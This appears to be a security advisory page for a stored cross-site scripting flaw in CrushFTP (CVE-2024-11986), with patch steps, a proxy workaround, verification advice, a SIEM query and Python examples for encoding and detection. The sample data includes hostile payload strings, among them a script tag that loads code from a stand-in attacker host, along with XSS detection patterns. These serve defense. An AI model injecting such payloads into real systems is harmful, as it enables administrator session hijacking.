CVE-2024-11986
📋 TL;DR
This vulnerability allows unauthenticated attackers to inject malicious scripts into CrushFTP's web request logs by sending requests with a crafted Host header; the header value is written to the log without validation. When an administrator later views those logs through the web interface, the log viewer renders the stored value without output encoding, so the script executes in the administrator's browser (stored cross-site scripting). Any CrushFTP instance whose web interface is reachable by the attacker and whose administrators review logs in the browser is exposed.
💻 Affected Systems
- CrushFTP
⚠️ Manual Verification Required
This CVE entry carries no version ranges in our database, so automatic vulnerability detection cannot determine whether your install is affected. The vendor update page linked under Fix & Mitigation is the authoritative source; it names 11.3.0 as the fixed release, and the version checks below use that number.
Why? The NVD entry does not specify affected version ranges (none provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Administrator account compromise leading to full system takeover, data exfiltration, or ransomware deployment through session hijacking.
Likely Case
Administrator session hijacking allowing privilege escalation, data theft, or further system compromise.
If Mitigated
Limited impact with proper input validation and output encoding preventing script execution.
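The two defences named above, validating the Host value before it is written and HTML-encoding log text when it is displayed, as an added Python example written for this page (not CrushFTP's code). The request records and the log line layout are constructed for illustration, and the hostname regex is an assumption about what a legitimate Host header looks like:

```python
import html
import re

# Assumption for this example: a syntactically valid Host header value is a
# hostname or a bracketed IPv6 literal, optionally followed by a port.
VALID_HOST = re.compile(r'^(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(:\d{1,5})?$')

# Constructed sample requests (not CrushFTP's real log format): one normal,
# one carrying a script tag in the Host header, as the CVE describes.
REQUESTS = [
    {"ip": "203.0.113.5", "path": "/WebInterface/", "host": "ftp.example.com"},
    {"ip": "203.0.113.9", "path": "/", "host": "<script src=//attacker.invalid/x.js></script>"},
]


def log_line_unvalidated(req):
    """Vulnerable ingestion: whatever the client sent as Host goes into the log verbatim."""
    return f'{req["ip"]} {req["path"]} Host={req["host"]}'


def log_line_validated(req):
    """Input validation: a Host value that is not a hostname is replaced by a
    neutral marker, so the attacker's text never reaches the log file."""
    host = req["host"]
    if not VALID_HOST.match(host):
        host = f"INVALID_HOST(len={len(host)})"
    return f'{req["ip"]} {req["path"]} Host={host}'


def render_vulnerable(lines):
    """Vulnerable log viewer: raw log text is spliced into the page, so the
    browser parses an injected Host value as markup and executes it."""
    return "<pre>" + "\n".join(lines) + "</pre>"


def render_hardened(lines):
    """Output encoding: the same text HTML-escaped; '<' becomes '&lt;' and the
    payload is displayed as literal characters instead of being executed."""
    return "<pre>" + "\n".join(html.escape(line, quote=True) for line in lines) + "</pre>"


def has_live_markup(page):
    """Check used by this example: does the rendered body still contain a raw
    '<', i.e. something the browser would treat as a tag?"""
    body = page[len("<pre>"):-len("</pre>")]
    return "<" in body


if __name__ == "__main__":
    raw = [log_line_unvalidated(r) for r in REQUESTS]
    print("vulnerable viewer, raw log       ->", has_live_markup(render_vulnerable(raw)))
    print("encoded viewer,    raw log       ->", has_live_markup(render_hardened(raw)))
    validated = [log_line_validated(r) for r in REQUESTS]
    print("vulnerable viewer, validated log ->", has_live_markup(render_vulnerable(validated)))
```

Either defence alone stops this particular payload, but only output encoding protects against values that slip past the validator (for example a log field that was never validated), so the viewer should encode regardless of how the log was written.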
🎯 Exploit Status
Only a single HTTP request with a crafted Host header is needed to plant the payload; no authentication is required. Execution, however, depends on an administrator later opening the web-based log viewer, so the attack needs that user interaction to complete.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 11.3.0 and later
Vendor Advisory: https://crushftp.com/crush11wiki/Wiki.jsp?page=Update
Restart Required: Yes
Instructions:
1. Download CrushFTP version 11.3.0 or later from the official site.
2. Stop the CrushFTP service.
3. Install/upgrade to the patched version.
4. Restart the CrushFTP service.
🔧 Temporary Workarounds
Host Header Validation
Put a reverse proxy or web application firewall in front of CrushFTP that only forwards requests whose Host header matches the names you actually serve, and closes the connection on anything else, so an arbitrary Host value never reaches CrushFTP's logs.
# Example nginx config: the default_server block closes the connection (444) on any unrecognised Host; only the named server proxies to CrushFTP. ftp.example.com and the 127.0.0.1:8080 listener are placeholders to replace with your own values.
server { listen 80 default_server; server_name _; return 444; }
server { listen 80; server_name ftp.example.com; location / { proxy_pass http://127.0.0.1:8080; } }
Log Viewer Restriction
Disable or restrict access to the web-based log viewing functionality until you have patched. Stored payloads only execute when the log is rendered in a browser, so reviewing the log files directly on the host (a terminal or text editor does not execute HTML) removes the trigger.
# Restrict the CrushFTP admin interface to trusted addresses and avoid opening the browser log viewer until patched
🧯 If You Can't Patch
- Add a strict Content Security Policy header (for example via a reverse proxy in front of the admin interface, since the policy must be set on the response that serves the log viewer) to block inline and off-site script execution; note this reduces the impact of a rendered payload but does not stop the injection into the logs
- Restrict network access to CrushFTP web interface using firewall rules
🔍 How to Verify
Check if Vulnerable:
Check CrushFTP version via admin interface or server logs; versions below 11.3.0 are vulnerable.
Check Version:
Check CrushFTP admin dashboard or run: java -jar CrushFTP.jar -version
Verify Fix Applied:
Confirm the version is 11.3.0 or higher, then send a request whose Host header carries a harmless marker tag (no script, for example a <b>marker</b> string) against a test instance and confirm the log viewer displays it as literal text rather than rendering it; use a dedicated test account and instance, not production logs.
📡 Detection & Monitoring
Log Indicators:
- Unusual Host header values containing script tags or JavaScript in web logs
- Administrator sessions active from a source address other than the one that logged in, shortly after the log viewer was opened (the pattern session hijacking produces)
Network Indicators:
- HTTP requests with malicious scripts in Host headers
- Unusual outbound connections from CrushFTP server after log access
SIEM Query:
source="crushftp.logs" AND (Host="*<script*" OR Host="*javascript:*")
This query only matches literal <script and javascript: text. URL-encoded payloads (%3Cscript), inline event handlers (onload=, onerror=) and tags such as <svg> or <img> slip past it, so pair it with a rule that flags any Host value that is not a plausible hostname (letters, digits, dots, hyphens, optional port, or a bracketed IPv6 literal).
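An added detection example, not part of the original page: a Python scan over constructed log lines that goes beyond a literal-string SIEM query by URL-decoding the Host value, matching event-handler and embedding-tag payloads as well as <script and javascript:, and flagging any Host that is not syntactically a hostname. The log line layout (an access-log style line with a host="..." field) and the extraction regex are assumptions; CrushFTP's real log format is not shown on this page and the parser must be adapted to it.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (access-log style with the Host header appended as
# host="..."); CrushFTP's actual log format is not shown on this page, so
# HOST_FIELD below is an assumption to adapt to your logs.
SAMPLE_LINES = [
    '203.0.113.5 - - [12/Dec/2024:10:01:02 +0000] "GET /WebInterface/login.html HTTP/1.1" 200 host="ftp.example.com"',
    '203.0.113.9 - - [12/Dec/2024:10:01:07 +0000] "GET / HTTP/1.1" 200 host="<script src=//attacker.invalid/x.js></script>"',
    '198.51.100.7 - - [12/Dec/2024:10:02:15 +0000] "GET / HTTP/1.1" 200 host="%3Csvg%20onload%3Dalert(1)%3E"',
    '198.51.100.8 - - [12/Dec/2024:10:03:00 +0000] "GET / HTTP/1.1" 200 host="ftp.example.com:8080"',
    '198.51.100.9 - - [12/Dec/2024:10:03:30 +0000] "GET / HTTP/1.1" 200 host="[2001:db8::1]:443"',
]

HOST_FIELD = re.compile(r'host="([^"]*)"')

# Assumption: a legitimate Host is a hostname or bracketed IPv6 literal with an
# optional port. Anything else is worth an alert even if no payload pattern hits.
VALID_HOST = re.compile(r'^(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(:\d{1,5})?$')

# Payload shapes a plain "*<script*" / "*javascript:*" query would miss.
XSS_MARKERS = {
    "script-tag": re.compile(r"<\s*script", re.I),
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
    "event-handler": re.compile(r"<\s*[a-z][^>]*\bon[a-z]+\s*=", re.I),  # e.g. <svg onload=
    "embedding-tag": re.compile(r"<\s*(iframe|img|svg|object|embed)\b", re.I),
}


def extract_host(line):
    """Pull the Host value out of one log line, or None if the field is absent."""
    match = HOST_FIELD.search(line)
    return match.group(1) if match else None


def classify_host(raw):
    """Return the reasons a Host value is suspicious (empty list = looks benign).
    The value is URL-decoded twice so %3Cscript and %253Cscript are both seen."""
    reasons = []
    decoded = unquote(unquote(raw))
    for name, pattern in XSS_MARKERS.items():
        if pattern.search(decoded):
            reasons.append(name)
    if not VALID_HOST.match(raw):
        reasons.append("not-a-hostname")
    return reasons


def scan(lines):
    """Run the classifier over log lines and return one alert per suspicious Host."""
    alerts = []
    for number, line in enumerate(lines, start=1):
        host = extract_host(line)
        if host is None:
            continue
        reasons = classify_host(host)
        if reasons:
            alerts.append({"line": number, "host": host, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(f"line {alert['line']}: {alert['reasons']} <- {alert['host']}")
```

The "not-a-hostname" check is the one that generalises: it catches payload shapes nobody has written a pattern for yet, at the cost of also flagging misconfigured clients, so route it to a lower-severity queue than the explicit marker hits.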